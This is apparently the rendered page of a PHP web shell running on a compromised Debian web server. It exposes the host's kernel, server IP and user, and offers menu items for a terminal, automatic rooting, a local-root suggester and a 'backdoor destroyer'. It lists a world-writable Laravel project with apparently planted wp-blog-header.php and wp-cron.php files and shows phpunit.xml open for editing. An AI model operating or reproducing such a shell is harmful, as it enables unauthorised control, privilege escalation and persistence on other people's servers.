Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.35
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
html_old /
iNetty /
Delete
Unzip
Name
Size
Permission
Date
Action
.github
[ DIR ]
drwxrwxrwx
2022-04-21 13:43
.scripts
[ DIR ]
drwxrwxrwx
2022-04-21 13:43
app
[ DIR ]
drwxrwxrwx
2022-04-21 13:43
bootstrap
[ DIR ]
drwxrwxrwx
2022-04-21 13:43
config
[ DIR ]
drwxrwxrwx
2022-04-21 13:43
database
[ DIR ]
drwxrwxrwx
2022-04-21 13:43
node_modules
[ DIR ]
drwxr-xr-x
2022-04-21 14:27
public
[ DIR ]
drwxrwxrwx
2022-04-21 13:49
resources
[ DIR ]
drwxrwxrwx
2022-04-21 13:44
routes
[ DIR ]
drwxrwxrwx
2022-04-21 13:44
storage
[ DIR ]
drwxrwxrwx
2022-04-21 13:44
tests
[ DIR ]
drwxrwxrwx
2022-04-21 13:44
vendor
[ DIR ]
drwxrwxrwx
2022-04-21 14:24
.DS_Store
10
KB
-rwxrwxrwx
2022-04-21 13:43
.editorconfig
220
B
-rwxrwxrwx
2022-04-21 13:43
.env
1.02
KB
-rwxrwxrwx
2022-04-21 13:47
.env.example
751
B
-rwxrwxrwx
2022-04-21 13:43
.gitattributes
111
B
-rwxrwxrwx
2022-04-21 13:43
.gitignore
198
B
-rwxrwxrwx
2022-04-21 13:43
.htaccess
197
B
-r--r--r--
2025-10-25 04:45
.styleci.yml
174
B
-rwxrwxrwx
2022-04-21 13:43
artisan
1.65
KB
-rwxrwxrwx
2022-04-21 13:43
composer.json
2.11
KB
-rwxrwxrwx
2022-04-21 17:40
package.json
1.59
KB
-rwxrwxrwx
2022-04-21 13:43
phpstan.neon
154
B
-rwxrwxrwx
2022-04-21 13:43
phpunit.xml
1.11
KB
-rwxrwxrwx
2022-04-21 13:43
readme.md
535
B
-rwxrwxrwx
2022-04-21 13:43
server.php
563
B
-rwxrwxrwx
2022-04-21 13:43
webpack.mix.js
549
B
-rwxrwxrwx
2022-04-21 13:43
wp-blog-header.php
2.73
KB
-r--r--r--
2025-10-25 04:45
wp-cron.php
2.73
KB
-rw-r--r--
2025-10-25 04:45
Save
Rename
<?xml version="1.0" encoding="UTF-8"?> <phpunit xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="./vendor/phpunit/phpunit/phpunit.xsd" bootstrap="vendor/autoload.php" colors="true"> <testsuites> <testsuite name="Unit"> <directory suffix="Test.php">./tests/Unit</directory> </testsuite> <testsuite name="Feature"> <directory suffix="Test.php">./tests/Feature</directory> </testsuite> </testsuites> <filter> <whitelist processUncoveredFilesFromWhitelist="true"> <directory suffix=".php">./app</directory> </whitelist> </filter> <php> <server name="APP_ENV" value="testing"/> <server name="BCRYPT_ROUNDS" value="4"/> <server name="CACHE_DRIVER" value="array"/> <server name="DB_CONNECTION" value="sqlite"/> <server name="DB_DATABASE" value=":memory:"/> <server name="MAIL_DRIVER" value="array"/> <server name="QUEUE_CONNECTION" value="sync"/> <server name="SESSION_DRIVER" value="array"/> </php> </phpunit>